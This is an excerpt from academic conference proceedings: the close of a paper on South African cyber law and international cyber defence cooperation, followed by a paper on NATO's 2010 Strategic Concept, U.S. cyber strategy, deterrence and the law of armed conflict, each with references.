The State is also responsible for providing sufficient international protection from cyber attacks<br />

conducted by its residents from its territory. It is the duty of any State from whose territory an<br />

internationally wrongful act is conducted to cooperate with the victim’s State and to prevent future<br />

similar harmful deeds. If the State itself is not capable of protecting the interests of another sovereign,<br />

it may also not allow for private persons acting from within its territory to inflict damage or create<br />

danger to that the other State while they are protected by its immunity. Under such an interpretation,<br />

Russia’s denial to persecute the perpetrators of the attack against Estonia would constitute an<br />

internationally wrongful act, while Israeli involvement and punishment of the actors behind the Solar<br />

Sunrise attack on United States Airforce databases using the Texas internet provider exonerates<br />

them from any international responsibility (Kulesza 2010).<br />

In this light, it is therefore the obligation of the South African government to launch and support<br />

awareness projects to prevent these attacks from inside its borders. This also includes the<br />

establishment of a CSIRT, as proposed in the draft South African Cyber security policy. Currently,<br />

South Africa is one of only a handful of countries that does not have a running CSIRT, putting South<br />

Africa in a disadvantaged position with regard to cyber attack and defense (FIRST 2009).<br />

96


Marthie Grobler et al.<br />

6. Working towards international cyber defense collaboration<br />

Cyber warfare is an emerging form of warfare not explicitly addressed by existing international law.<br />

While most agree that legal restrictions should apply to cyber warfare, the international community<br />

has yet to reach consensus on how international humanitarian law (IHL) applies to this new form of<br />

conflict (Kelsey 2008). In particular, there is a need for an international consensus on the due<br />

diligence criteria which have to be fulfilled by a State in order to avoid international responsibility for<br />

failing to protecting other sovereigns from cyber attacks conducted from its territory.<br />

Another crucial issue would be to establish the standards for releasing a State from any international<br />

responsibility for not providing due diligence: would the adoption of specific provisions in national<br />

criminal laws be sufficient or would State authorities need to initiate a criminal investigation<br />

effectively? It should also be clarified whether a due diligence standard can be set post factum – after<br />

an attack had already taken place (Kulesza 2010). In South Africa, this is not possible.<br />

A suggested approach to create Nation State responsibility in building a credible cyber system<br />

involves the following steps:<br />

Developing a national strategy and making sure all agencies and major stakeholders follow it;<br />

Establishing a national endorsement body for cyber security;<br />

National coordination mechanism;<br />

Inclusion of all professional communities and private sector, and others in national cyber security<br />

effort; and<br />

Providing necessary resources and institutional changes (Tiirmaa-Klaar 2010).<br />

If all the States internationally can implement their own credible cyber system, cooperation on an<br />

international cyber defense level will be easier to realize. As an initial attempt to enable a more<br />

uniform cyber defense system, the <strong>European</strong> Commission is planning to impose harsher penalties for<br />

cyber crimes. Large-scale attacks in Estonia and Lithuania in recent years have highlighted the need<br />

for a stronger stance on cyber crime. Estonia, Lithuania, France and the United Kingdom also have<br />

longer sentences for such crime, and the <strong>European</strong> Commission is looking to harmonize practice<br />

across the member states. United States president Barack Obama has declared cyber crime to be a<br />

priority. In addition to stronger laws, the <strong>European</strong> Union is looking to set up a system through which<br />

member states can contact each other quickly to notify one another of attacks. That would help to<br />

build a picture of the scope of cyber crime (Geers ND).<br />

7. Conclusion<br />

The Internet has changed almost all aspects of human life, also including the nature of warfare. Every<br />

political and military conflict now has a cyber dimension, whose size and impact are difficult to predict.<br />

"The ubiquitous nature and amplifying power of the Internet mean that future victories in cyber space<br />

could translate into victories on the ground. National critical infrastructures, as they are increasingly<br />

connected to the Internet, will be natural targets during times of war. Therefore, nation-states will<br />

likely feel compelled to invest in cyber warfare as a means of defending their homeland and as a way<br />

to project national power" (Geers ND).<br />

The international scope of the internet and wide reach of technological usage has a tremendous<br />

impact on the nature of war and crimes globally. This article showed the impact of technological<br />

revolutions on warfare, the South African legislative system affecting warfare and cyber war, and the<br />

need for international cyber defense collaboration.<br />

References<br />

ECT Act (Electronic Communications and Transactions Act No 25 of 2002). (2002). Available from:<br />

http://www.acts.co.za/ect_act/ (Accessed 10 October 2010).<br />

FIRST. (2009). FIRST: Teams around the world. Available from: http://www.first.org/members/map/ (Accessed 14<br />

October 2010).<br />

Gardner, F. (2009). Nato's cyber defence warriors. BBC News. Available from: http://news.bbc.co.uk/<br />

2/hi/europe/7851292.stm (Accessed 22 September 2010).<br />

Geers, K. (ND). Cyber Defence. Available from: http://www.vm.ee/?q=en/taxonomy/term/214 (Accessed 22<br />

September 2010).<br />

97


Marthie Grobler et al.<br />

Giles, J. (2010). How will the PPI Bill affect you? Available from: http://www.michalsonsattorneys.com/ how-willthe-ppi-bill-affect-you/2586?gclid=COXtlKz6yKQCFcbD7QodHzHJDg<br />

(Accessed 10 October 2010).<br />

Government Gazette. (2003). Vol. 451 Cape Town 15 January 2003 No. 24250. No. 54 of 2002: Promotion of<br />

Access to Information Amendment Act, 2002.<br />

International Standards Organization. (2008). ISO/IEC 27005: 2005. Information security risk management.<br />

Available from: http://www.iso.org/iso/catalogue_detail?csnumber=50297 (Accessed 10 October 2010).<br />

Kelsey, JTG. (2008). Hacking into International Humanitarian Law: The Principles of Distinction and Neutrality in<br />

the Age of Cyber Warfare. P1427. Available from: http://heinonline.org/HOL/Landing<br />

Page?collection=journals&handle=hein.journals/mlr106&div=64&id=&page= (Accessed 22 September<br />

2010).<br />

Krepinevich, AF. (2003). Keeping pace with the military-technological revolution. Available from:<br />

http://www.issues.org/19.4/updated/krepinevich.pdf (Accessed 22 September 2010).<br />

Kulesza, J. (2010). State responsibility for acts of cyber-terrorism. 5 th GigaNet symposium Vilnius, Lithuania.<br />

Markoff, J. (2010). Step Taken to End Impasse Over Cybersecurity Talks. Available from: http://www.<br />

nytimes.com/2010/07/17/world/17cyber.html?_r=1 (Accessed 8 October 2010).<br />

NATO. (ND). Defending against cyber attacks. Available from: http://www.nato.int/cps/en/natolive/<br />

topics_49193.htm (Accessed 22 September 2010).<br />

O'Hanlon, ME. (2000). Technological change and the future of warfare. Brookings Institution Press: Washington.<br />

Owen, RS. (2008). Infrastructures of Cyber Warfare. Chapter V. In: Janczewski, L. & Colarik, AM. Cyber warfare<br />

and cyber terrorism. Information Science Reference: London.<br />

PAIA Act (Promotion of Access to Information Act No 2 of 2000 as amended). (2000). Available from:<br />

http://www.dfa.gov.za/department/accessinfo_act.pdf (Accessed 10 October 2010).<br />

Republic of South Africa. (2010). Protection of Personal Information Bill. Available from:<br />

http://www.justice.gov.za/legislation/bills/B9-2009_ProtectionOfPersonalInformation.pdf (Accessed 10<br />

October 2010).<br />

RIC Act (Regulation of Interception of Communications and Provision of Communication-related information Act.<br />

(2002). Available from: http://www.acts.co.za/ric_act/whnjs.htm. (Accessed 10 October 2010).<br />

SA Constitution. (1996). Available from: http://www.info.gov.za/documents/constitution/index.htm (Accessed 10<br />

October 2010).<br />

Tiirmaa-Klaar, H. (2010). International Cooperation in Cyber Security: Actors, Levels and Challenges. Cyber<br />

security 2010, Brussels, 22 September 2010 (<strong>Conference</strong>).<br />

UN Information Officer. (2010). Delegates Consider Best Response to Cybercrime as Congress Committee -<br />

Takes Up Dark Side of Advances in Information Technology. Available from:<br />

http://www.un.org/News/Press/docs/2010/soccp349.doc.htm (Accessed 10 October 2010).<br />

Warren, MJ. (2008). Terrorism and the internet. Chapter VI. In: Janczewski, L. & Colarik, AM. Cyber warfare and<br />

cyber terrorism. Information Science Reference: London.<br />

Williams, G. & Arreymbi, J. (2007). Is cyber tribalism winning online information warfare? ISSE/ SECURE 2007<br />

Securing Electronic Business Processes (2007): 65-72, January 01, 2007.<br />

Wilson, C. (2007). Information Operations, Electronic Warfare and Cyberwar: Capabilities and related policy<br />

issues. CRS report for congress. Available from: www.fas.org/sgp/crs/natsec/ RL31787.pdf (Accessed 17<br />

September 2010).<br />

98


Cyber Strategy and the Law of Armed Conflict<br />

Ulf Haeussler<br />

National Defense University, Washington, USA<br />

ulf.haeussler@ndu.edu<br />

Abstract: At the time of writing, the author was Assistant Legal Advisor Operational Law, Headquarters,<br />

Supreme Allied Commander Transformation (NATO HQ SACT). The views expressed herein are the author's<br />

own and to not necessarily reflect the official position or policy of NATO and/or HQ SACT. Abstract: At its Lisbon<br />

Summit (November 2010), NATO has adopted its Strategic Concept. The U.S. may soon adopt its Cyberstrategy<br />

3.0 (originally expected for December 2010). Both strategy documents will contribute to a growing policy<br />

consensus regarding cyber security and defence as well as provide better policy insights regarding cyber offence.<br />

In doing so, they will contribute to a better understanding of how NATO and the U.S. want to prepare for, and<br />

conduct cyber warfare in a manner congruent with the law of armed conflict. In addition, they will determine to<br />

what extent this branch of the law needs to be better understood, developed, or reformed. Accordingly, this paper<br />

indicates how the existing legal and policy frameworks intersect with practical aspects of cyber warfare and<br />

associated intelligence activities, analyses how the new strategy documents develop and change the existing<br />

policy framework, and what repercussions this may have for the interpretation and application of the law of armed<br />

conflict. It also demonstrates how the new strategy documents inform the policy and legal discourse and hence<br />

help confirm that NATO and U.S. as well as other NATO Nations' cyber activities are, and will continue to be,<br />

lawful and legitimate.<br />

Keywords: NATO Strategic Concept 2010, U.S. Cyberstrategy 3.0, Law of Armed Conflict, collective security,<br />

collective defence<br />

1. Introduction<br />

Cyberspace is increasingly referred to as one of the global commons and as the fifth domain in which<br />

warfare may occur (Lynn 2010, 101). Activities in cyberspace as well as involving the use of cyber<br />

capabilities to create, or contribute to the creation of, effects in any one of the other commons, or<br />

domains, have attracted significant discussion and analysis among technical experts, policymakers,<br />

and legal scholars. The ensuing efforts to develop frameworks for cyberspace and the use of<br />

associated capabilities (hereinafter collectively referred to as 'cyberspace') bring various perspectives<br />

to bear. Cyberspace is multifunctional; it equally attracts private activities (with a strong business<br />

component) and governments' official conduct as well as associated competing, if not conflicting,<br />

interests. Not surprisingly, cyberspace has its unarguable dark side – on both its non-governmental<br />

and its governmental end. The range of challenges and threats associated with the dark side of<br />

cyberspace comprises, but is not limited to, privacy intrusions, financial loss, damage and destruction<br />

in the physical domains, the potential of injury or even death, and (other) adverse effects on the<br />

effectiveness of government. These challenges and threats reflects the large extent to which<br />

computers and other information and communication technology devices can be leveraged as<br />

weapons by non-governmental actors. Further challenges may arise out of policy positions adopted<br />

by some non-governmental actors. For instance, the so-called 'internet pirates' endorse the notion of<br />

a cyberspace beyond any government control whatsoever – a desire which, were it to come true,<br />

might exacerbate all other challenges and threats referred to above.<br />

Attempts to characterise cyber challenges and threats have usually used references to challenges<br />

and threats in the physical domains, to which the word 'cyber' is added as a qualifier, enabling the<br />

creation of catchwords such as cyber crime, cyber terrorism, and cyber attack. The terminology<br />

developed using this method is attractive because it triggers analogies with known phenomena.<br />

However, it is also prone to carrying misleading connotations since such analogies may easily fuel<br />

misconceptions. For instance, the terms 'cyber crime' and 'cyber terrorism' do not capture the whole<br />

range of non-governmental actors' malicious activities; moreover, they do not even attempt to address<br />

possible links between non-governmental actors and their potential governmental sponsors. By<br />

contrast, the term 'cyber attack' is too broad. Thus, information gathering activities may be referred to<br />

as cyber attacks, though they might not necessarily or directly cause tangible damage. The<br />

undifferentiated use of the notion of 'attack' may foster arguments by which a nation's inherent right of<br />

self-defence is considered relevant to cyber activities or actions which neither has nor causes<br />

potential or actual adverse effects. These examples may be indicative of a gap between technological<br />

realities and the terminology used in policymaking as well as legal interpretation.<br />

99


Ulf Haeussler<br />

Following the cyber incident Estonia sustained in 2007 and the probable integration of a cyber line of<br />

operation in the Russian campaign against Georgia in 2008, the discussion and analysis regarding<br />

cyber challenges and threats has gathered new momentum. The recent Stuxnet incident might have<br />

taken this discussion and analysis to a turning point, for many observed that the Rubicon has been<br />

crossed regarding the development of real 'cyber weapons'. NATO's 2010 Strategic Concept and the<br />

expected U.S. Cyberstrategy 3.0 (will) represent a sophisticated approach towards cyber challenges<br />

and threats. As far as collective security and defence are concerned, they (will) confirm that the dark<br />

side of cyber involves more than just economic crime, and that most of its emanations can be<br />

effectively addressed: through the existing mechanisms designed to maintain and restore<br />

international peace and security as well as the principles and rules governing the conduct of<br />

hostilities, on the one hand and the protection of civilians and other individuals in the course of armed<br />

conflict on the other hand. At the same time, they (will) indicate why and how these existing<br />

frameworks support preventive measures and hence enhance the full spectrum of collective cyber<br />

security and defence. As a result, they (will) inform the interpretation and application of both branches<br />

of the law of armed conflict, that is, the legal framework informing decision-making processes on<br />

whether as well as how to use force in international relations or against non-governmental actors.<br />

2. Developing cyber policy consensus regarding collective defence<br />

Like any other legal source, international law, including the law of armed conflict, is rooted in policy<br />

consensus. For the challenges and threats associated with the dark side of the cyberspace to be<br />

captured by the law of armed conflict they must be an integral part of the policy consensus regarding<br />

the relevant international agreements and customary rules. Two basic concepts used by the law of<br />

armed conflict stand out in this respect: the notion of 'armed attack' (cf. Article 51 of the UN Charter,<br />

Article 5 of the North Atlantic Treaty, and Article 7 of the Rio Treaty), triggering the right of individual<br />

and collective self-defence; and the notion of 'attack' (cf. Article 49 of the First Additional Protocol to<br />

the Geneva Conventions), guiding many aspects of the conduct of hostilities within an armed conflict.<br />

These terms of art also reflect the fundamental differentiation within the law of armed conflict between<br />

the principles and rules that govern the legality of the use of force in international relations (jus ad<br />

bellum) and the conduct of hostilities (jus in bello).<br />

Political and military strategies have an important role to play in the process of consensus-building<br />

regarding international law. They reflect how States individually and collectively assess their scope of<br />

action – assuming for this purpose that no State has a genuine desire to consider acting, or to actually<br />

act, deliberately illegal. If this assumption is accepted, then NATO's Strategic Concept 2010 indicates<br />

more than that cyber incidents may trigger its collective security and defence mechanisms. It also<br />

confirms, as a matter of policy consensus, that cyber incidents are capable of amounting to an armed<br />

attack within the coordinates of the law of armed conflict. Likewise, the U.S. Department of Defense's<br />

readiness to coordinate its cyber defence effort across the government, with allies, and with partners<br />

in the commercial sector (cf. Lynn 2010, 103) does not only leverage collective security and defence<br />

as one aspect of the U.S. response to cyber threats. It also indicates that nothing in the law of armed<br />

conflict is considered an obstacle to utilising these mechanisms.<br />

Since an effort at developing consensus among 28 sovereign States will yield a different result than<br />

policy determinations within one sovereign State's government, the development of NATO cyber<br />

defence policy until 2010 will be analysed to identify the Euro-Atlantic common denominator,<br />

denominator which – one would expect – the drafters of U.S. Cyberstrategy 3.0 are fully aware of.<br />

NATO's consensus-building process regarding cyber defence policy started with its Strategic Concept<br />

1999. In this document, NATO observed that 'state and non-state adversaries may try to exploit the<br />

Alliance's growing reliance on information systems through information operations designed to disrupt<br />

such systems' (NATO 1999, paragraph 23). However, only after Estonia had sustained the wellknown<br />

cyber incident did NATO actually adopt a cyber defence policy and started developing<br />

structures and authorities to carry it out (NATO 2008, paragraph 47). Roughly two years after the<br />

cyber incident sustained by Estonia and nearly a year after Russia had possibly integrated a cyber<br />

line of operation in its campaign against Georgia (cf. Gates 2009, 5; Ilves 2010; but see also<br />

Independent International Fact-Finding Mission 2010, Vol II, 217sqq), NATO still conceded that<br />

despite the establishment of its Cyber Defence Management Authority and improvements of the<br />

existing NATO Computer Incident Response Capability (NCIRC), its cyber defence capabilities yet<br />

had to achieve full readiness (NATO 2009, paragraph 49). That notwithstanding, since 2008 NATO<br />

policy couples the notions of protecting key information and communication systems on which the<br />

100


Ulf Haeussler<br />

Alliance and Allies rely with countering – later rephrased as responding to – cyber attacks using its<br />

own cyber defence capabilities as well as leveraging linkages between NATO and national authorities<br />

(NATO 2008, paragraph 47 and NATO 2009, paragraph 49), and – envisaged since 2009 –<br />

appropriate partnerships and cooperation (NATO 2009, ibid.).<br />

NATO policy developed since 1999 is correctly based on the observation that NATO and its Nations<br />

rely significantly on information and communication systems, reliance susceptible to exploitation. It is<br />

worthwhile mentioning that the observation referred to is not a reference to the notion of 'cyber<br />

exploitation' which by definition captures non-destructive information gathering activities which may be<br />

performed by strategic competitors and potential adversaries (Owens et al. 2009, 1). Conversely, in<br />

using the term 'disrupt', NATO’s Strategic Concept 1999 had introduced language which covers both<br />

potential destructive effects of cyber attacks and other adverse effects of the same scale and gravity.<br />

(Note that the term 'to disrupt' is defined as 'to cause disorder in something' (Oxford 1989, 348);<br />

'causing disorder' in ICT is tantamount to causing its losing part or all of its operability.) The language<br />

used at a later stage does not indicate a change of this appraisal of the possible consequences of<br />

cyber attacks. In particular, the notion of countering cyber attacks, used in the Bucharest Summit<br />

Declaration 2008, is sufficiently close to the general doctrinal notion of counterattack to suggest that<br />

its drafters had the idea of counter-offensive in mind. The fact that NATO later substituted the notion<br />

of 'responding' to cyber attacks for the initially used term 'countering' them does not contradict this<br />

assessment since countering cyber attacks is but one possible option for responding to them.<br />

Actually, 'responding' is broader in scope; in addition to counter-offensive measures it also captures a<br />

wide range of other measures including those of a political and diplomatic nature.<br />

Taking the different points of view regarding the legal nature of cyber attacks into account, NATO's<br />

policy documents help consolidating the developing consensus regarding the interpretation of the law<br />

of armed conflict in cyber matters. Fully aware of the unsettled legal nature of cyber attacks, NATO<br />

has agreed to multiple documents which in unison do not rule out that cyber attacks – initially referred<br />

to as information operations – may be considered as destructive, or potentially destructive, in nature.<br />

Now that the capacity to be destructive, or potentially destructive, in nature is a quintessential<br />

characteristic of both armed attacks as defined for the purposes of the jus ad bellum and attacks as<br />

defined for the purposes of the jus in bello, NATO's policy declarations necessarily imply the<br />

Alliance’s tacit endorsement of the view that cyber attacks – at least theoretically – can have the<br />

nature of armed attacks and/or attacks, as the case may be. It is important to note that, depending on<br />

the circumstances, an act opening hostilities may coincidentally be an armed attack from a jus ad<br />

bellum perspective and an attack from a jus in bello perspective. However, this coincidence would be<br />

one of fact rather than an amalgamation of these notions which belong to different branches of<br />

international law and hence warrant separate assessment.<br />

International treaty law often captures new factual developments through subsequent agreement<br />

regarding the interpretation of a treaty or the application of its provisions (cf. Article 31(3)(a) of the<br />

Vienna Convention on the Law of Treaties). Whilst NATO policy does not represent agreement which<br />

would bring all cyber attacks within the ambit of the North Atlantic Treaty and other relevant<br />

international agreements, it does a fortiori not exclude individual cyber attacks from being considered<br />

as an armed attack and/or an attack.<br />

NATO's Strategic Concept 2010 confirms and reinforces earlier policy. Its assessment of the security<br />

environment states that cyber attacks 'can reach a threshold that threatens national and Euro-Atlantic<br />

prosperity, security and stability', and that foreign militaries can be 'the source of such attacks' (NATO<br />

2010a, at paragraph 12). In addressing Article 5 of the North Atlantic Treaty, NATO stresses its<br />

responsibility 'to protect and defend our territory and our population against attack' (id., paragraph 16).<br />

Whilst critical infrastructure is captured by the notion of territorial defence, the reference to the<br />

population should be read as to comprise key elements of statehood such as governability – essential<br />

to human security – and the integrity of democratic decision-making – an essential tenet of<br />

participatory democracy (Häußler 2010). NATO has also expressly embraced the need to further<br />

develop its 'ability to prevent, detect, defend against and recover from cyber-attacks' (NATO 2010a,<br />

paragraph 19) and its aim to 'carry out the necessary … information exchange for assuring our<br />

defence against ... emerging security challenges'. The notion of 'emerging security challenges',<br />

though not expressly defined, is illustrated by the portfolio of the recently established NATO<br />

Headquarters directorate carrying the same name, which comprises challenges arising in and out of<br />

101


Ulf Haeussler<br />

the cyberspace. The Lisbon Summit Declaration further elaborates and reinforces the full integration<br />

of cyber defence in NATO's collective security and defence framework (NATO 2010b, paragraph 47).<br />

3. Leveraging collective defence for collective security through deterrence<br />

Credible deterrence is a complex achievement which traditional strategy used to build on multiple<br />

pillars, involving containment (including through the prospect of retaliation) and arms control (that is,<br />

confidence building and disarmament). NATO and the U.S. use different definitions of deterrence in<br />

military doctrine. These definitions have in common that both are concerned with potential<br />

adversaries' perceptions of the relationship between action and counteraction. However, they<br />

describe the method to influence potential adversaries' mindsets in fairly different manners. NATO<br />

defines the notion of deterrence as '[t]he convincing of a potential aggressor that the consequences of<br />

coercion or armed conflict would outweigh the potential gains'; the definition continues to observe that<br />

'[t]his requires the maintenance of a credible military capability and strategy with the clear political will<br />

to act' (NATO Glossary, 2-D-6). By contrast, the U.S. definition of deterrence is more outspoken about<br />

the method by which to influence potential adversaries' mindsets. It clearly favours containment,<br />

explaining that '[d]eterrence is a state of mind brought about by the existence of a credible threat of<br />

unacceptable counteraction'. On this basis, it is able to describe the nature of the mindset desired on<br />

the part of potential adversaries in capturing the notion of deterrence through a reference to '[t]he<br />

prevention from action by fear of the consequences' (DoD Dictionary, 139).<br />

International security is a product of multiple factors of which deterrence is but one. Resilience<br />

towards potential threats and rules incentivising desired conduct are equally important; they are tools<br />

to prevent differences from growing into disputes, or the pacific settlement of the latter, as the case<br />

may be. However, experience confirms that incentivising tools will not always suffice to avert all<br />

potential threats. Accordingly, cyber deterrence – based on the availability of defence and counteroffence<br />

capabilities as well as the political will to use them, if required – will make a viable contribution<br />

to international security. NATO is ready for cyber deterrence. It is continuously improving relevant<br />

capabilities, and the Strategic Concept 2010 has tied the knot on the evolving integration of cyber<br />

defence in the notion of collective defence.<br />

NATO is not only increasingly well prepared to develop effective deterrence against cyber attacks the<br />

organisation itself or its members may have to face in the future. The Alliance is also able, as a matter<br />

of policy, to deter undesirable usages of cyberspace affecting its operations through a cyber line of<br />

operation, regardless of whether they serve the purpose of collective defence (Article 5 of the North<br />

Atlantic Treaty) or have the character of Non-Article 5 Crisis Response Operations (Häußler 2011,<br />

168).<br />

In light of the foregoing, NATO's policy choice not to exclude cyber attacks from its collective defence<br />

mechanism (Article 5 of the North Atlantic Treaty) has a significant aspect with regard to deterrence.<br />

As long as its collective defence mechanism is a viable option, the Alliance can – a maiore ad minus –<br />

even more convincingly tackle challenges associated with cyberspace through its collective security<br />

mechanism. Whilst the latter primarily relies on consultations as envisaged in Article 4 of the North<br />

Atlantic Treaty, its invocation may result in effective measures short of the use of force. As indicated<br />

by the single reported case of an express invocation of Article 4 by a NATO Nation, consultations<br />

pursuant to this article may lead to the deployment of appropriate capabilities – up to and including<br />

those represented by armed forces – to respond to the aforementioned security threats. In February<br />

2003, Turkey asked for consultations concerning its defence needs arising out of the impending<br />

resumption of hostilities against Iraq (Gallis 2003, 1). The consultations were conducted by NATO's<br />

Defence Planning Committee which requested military advice from NATO's Military Authorities, and,<br />

having obtained the latter, authorised the implementation of defensive measures (NATO DPC 2003).<br />

In a similar manner, in the event of a cyber incident, NCIRC Rapid Reaction Teams (RRTs) may<br />

support national Computer Emergency Response Teams (CERTs) (cf. NCSA 2009). By reinforcing<br />

existing defences, the deployment of RRTs may make an effective contribution to deterring unfriendly<br />

activities whose prospect of success they reduce or deny. Accordingly, consultations may result in<br />

preventive deterrence: provided they are not a means of last resort in a misguided approach focusing<br />

on "talking only" whilst "no action" is allowed to occur.<br />

As indicated above, NATO's cyber security and defence policy is geared towards supporting national<br />

efforts. This approach extends the consolidated practice of cooperation within NATO to the<br />

cyberspace. As illustrated by the response to the 9/11 attack on the U.S. as well as the steps<br />

102


Ulf Haeussler<br />

following the invocation of Article 4 by Turkey, NATO's collective security and defence mechanisms<br />

rely on the assessment of the Nation affected. Though NATO first and foremost provides an umbrella<br />

enabling Allies' mutual support, it may also decide to launch operations led by the Alliance, such as<br />

Operation Active Endeavour following the 9/11 attack. NATO's strategic policy choices regarding<br />

cyber security and defence may in a similar manner serve as an interface for connecting national<br />

security and defence efforts. After its adoption, Cyberstrategy 3.0 may demonstrate what the U.S.<br />

expects as well as what it is prepared to contribute to achieve such 'greater levels of cooperation [as]<br />

needed to stay ahead of the cyberthreat' (Lynn 2010, 105).<br />

4. Cyberstrategy 3.0 – cyber defence as an integral part of national defence<br />

NATO's positive acknowledgement, through its strategic policy consensus, of a nation's sovereign<br />

right to consider cyber defence as an integral part of national security and defence, has clear legal<br />

implications. It is this acknowledgement by which NATO has confirmed that national cyber security<br />

and defence is eligible for support through its collective security and defence mechanisms. That said,<br />

there are two different ways of looking at national cyberstrategy. On the one hand, a national<br />

cyberstrategy is likely to represent the codification of national cyber security and defence concerns<br />

ranging from a description of the situation, own and adversarial, through a survey of the broader<br />

operating environment to the resulting assessment and conclusions. On the other hand, a national<br />

cyberstrategy may also indicate in what situations NATO could theoretically expect to receive<br />

requests for consultation under Article 4, or for collective self-defence under Article 5 of the North<br />

Atlantic Treaty, as well as what capabilities might be available to support collective efforts made under<br />

the auspices of the Alliance.<br />

The description of the situation in cyberspace in which constitutional democracies in general and<br />

NATO Nations in particular are likely to find themselves is comprised in the observation that: 'In less<br />

than a generation, information technology in the military has evolved from an administrative tool for<br />

enhancing office productivity into a national strategic asset in its own right' (id., 98).<br />

Adversaries can easily exploit this situation by leveraging off the shelf technology which is not only<br />

available at comparably low cost but also can be put to use by a limited number of personnel – '[a]<br />

dozen determined computer programmers' (ibid.) – 'if they find a vulnerability to exploit' (ibid.). The<br />

unpleasant reality is that 'today anyone with a computer can engage in some level of cyber<br />

destruction' (Vamosi 2011, quoting the National Defense University's F.D. Kramer). In addition, the<br />

estimates that programming the Stuxnet code may have taken about half a year also indicates that<br />

warning periods regarding a force build-up in the cyberspace are much smaller than regarding a<br />

conventional force build-up. However, there may not be any warning period at all if, like in the case of<br />

Stuxnet, an adversary manages to launch a zero-day attack or leverage a zero-day exploit (Wikipedia,<br />

Zero Day Attack).<br />

That said, it is not surprising that '[i]n cyberspace, the offense has the upper hand', factor requiring a<br />

flexible strategy since '[i]n an offense-dominant environment, a fortress mentality will not work' (Lynn<br />

2010, 99). Accordingly, evolving U.S. cyber strategy is likely to put less emphasis on containment<br />

than traditional strategy as embodied in military doctrine. According to the U.S. Deputy Secretary of<br />

Defense, 'traditional Cold War deterrence models of assured retaliation do not apply to cyberspace,<br />

where it is difficult and time consuming to identify an attack's perpetrator' (ibid.). This observation<br />

does not simply shift the emphasis from containment to arms control. On the contrary, '[t]raditional<br />

arms control regimes would likely fail to deter cyberattacks because of the challenges of attribution,<br />

which make verification of compliance almost impossible.' (id., 100).<br />

In essence, this means that both traditional elements of deterrence seem to be considered<br />

unsatisfactory for the purposes of cyber deterrence. It is hence fairly unlikely that efforts made by<br />

some States to leverage support for cyber arms control within the United Nations will yield tangible<br />

results any time soon. Whilst cyber deterrence does not abandon the approach based on influencing<br />

potential adversaries' mindsets (Vamosi 2011) it will most likely have to rely on different methods to<br />

achieve this desired effect. In particular, cyber 'deterrence will necessarily be based more on denying<br />

any benefit to attackers than on imposing costs through retaliation' (Lynn 2010, 99sq). This approach<br />

couples elements of 'defensive resilience [within] cyber networks' (Vamosi 2011, quoting F.D. Kramer)<br />

and active defence. To that end, it may require different models of 'international norms of behavior in<br />

cyberspace … such as that of public health or law enforcement' (Lynn 2010, 100). Normative models<br />

derived from international environmental law might also be instrumental. In the U.S., active defence of<br />

103


Ulf Haeussler<br />

defence sector computer networks complements 'ordinary computer hygiene, which keeps security<br />

software and firewalls up to date, and sensors, which detect and map intrusions' (id., 103). Defence<br />

sector networks rely on systems that, using (signals) intelligence warnings, 'automatically deploy<br />

defenses to counter intrusions in real time' (ibid.). 'They work by placing scanning technology at the<br />

interface of military networks and the open Internet to detect and stop malicious code before it passes<br />

into military networks' (ibid.). Moreover, the notion of active defence also covers the effort to detect<br />

intruders who have managed to escape detection at the interface (ibid.).<br />

In sum, the evolving U.S. approach of defensive resilience coupled with active defence and NATO's<br />

emerging notion of preventive deterrence seem to correspond harmoniously. As cyberstrategy<br />

development continues, the impact of NATO's and national approaches on the conduct of military<br />

operations in general and the conduct of hostilities in particular will require associated legal analysis.<br />

Rather than focusing on cyber operations in isolation, this analysis will have to consider that cyber<br />

warfare may become part of a spectrum of military responses available to the relevant policymakers<br />

(cf. Vamosi 2011).<br />

5. Conclusion<br />

From an international law perspective, the choices regarding cyber security and defence made by<br />

NATO's Strategic Concept 2010 correspond to questions related to the legality of use of force (jus ad<br />

bellum) and implicitly defer questions pertaining to the legal framework governing the conduct of<br />

hostilities (jus in bello) to future analysis. National cyberstrategy development points in the same<br />

direction. From an overall perspective, cyberstrategy development has the demonstrated potential to<br />

accelerate consensus building processes regarding the question of whether cyber attacks can be<br />

matters of national security and defence, including through effective deterrence, and in that capacity<br />

also trigger collective security and defence mechanisms like those based on the North Atlantic Treaty.<br />

At the same time, existing and evolving cyberstrategies do not yet provide all necessary insights<br />

regarding important questions such as how to leverage normative models of public health and<br />

environmental protection as well as the adaptation to cyberspaces' realities of the notions of<br />

combatancy and direct participation in hostilities, targetability of civilian objects turned military<br />

objectives, questions answer which still involves challenges in light of technical realities which may<br />

defy the development of prognoses required to develop an expectation regarding collateral damage<br />

and an anticipation of military advantage with a sufficient degree of predictability.<br />

References<br />

Gallis, P. (2003) NATO’s Decision-Making Procedure (CRS Report for Congress, Order Code', RS21510, 05 May<br />

2003), http://www.fas.org/man/crs/RS21510.pdf<br />

Gates, R.M., U.S. Secretary of Defense (2009) "The National Defense Strategy", Joint Forces Quarterly, issue<br />

52, 1 st quarter 2009, 1-7<br />

Häußler, U. (2010) "Cyber Security and Defence from the Perspective of Articles 4 and 5 of the North Atlantic<br />

Treaty", Tikk, E. and Talihärm, A.-M., International Cyber Security Legal & Policy Proceedings, 100-126<br />

Häußler, U. (2011) "Crisis Response Operations in Maritime Environments", Odello, M. and Piotrowicz, R.,<br />

International Military Missions and International Law (forthcoming: Brill, Amsterdam), 161-210<br />

Ilves, His Excellency Mr. T.H., President of the Republic of Estonia (2010) Opening Address at the June 2010<br />

Cyber Conflict <strong>Conference</strong>, http://www.ccdcoe.org/conference2010/329.html; cf.<br />

http://www.nato.int/cps/en/SID-B2AD4DE6-E0B91B4E/natolive/news_64615.htm?<br />

Independent International Fact-Finding Mission on the Conflict in Georgia established by the <strong>European</strong> Union<br />

(2010), Report, Vol II<br />

Lynn, W.J. III "Defending a New Domain – The Pentagon’s Cyberstrategy", Foreign Affairs Volume 89 Number 5,<br />

97-108<br />

NATO (1999) The Alliance's Strategic Concept dated 24 April 1999,<br />

http://www.nato.int/cps/en/natolive/official_texts_27433.htm<br />

NATO (2008) Bucharest Summit Declaration dated 03 April 2008,<br />

http://www.nato.int/cps/en/natolive/official_texts_8443.htm<br />

NATO (2009) Strasbourg / Kehl Summit Declaration dated 04 April 2009,<br />

http://www.nato.int/cps/en/natolive/news_52837.htm?mode=pressrelease<br />

NATO (2010a) Active Engagement, Modern Defence – Strategic Concept 2010 dated 19 November 2010,<br />

http://www.nato.int/lisbon2010/strategic-concept-2010-eng.pdf<br />

NATO (2010b) Lisbon Summit Declaration dated 20 November 2010,<br />

http://www.nato.int/cps/en/natolive/official_texts_68828.htm<br />

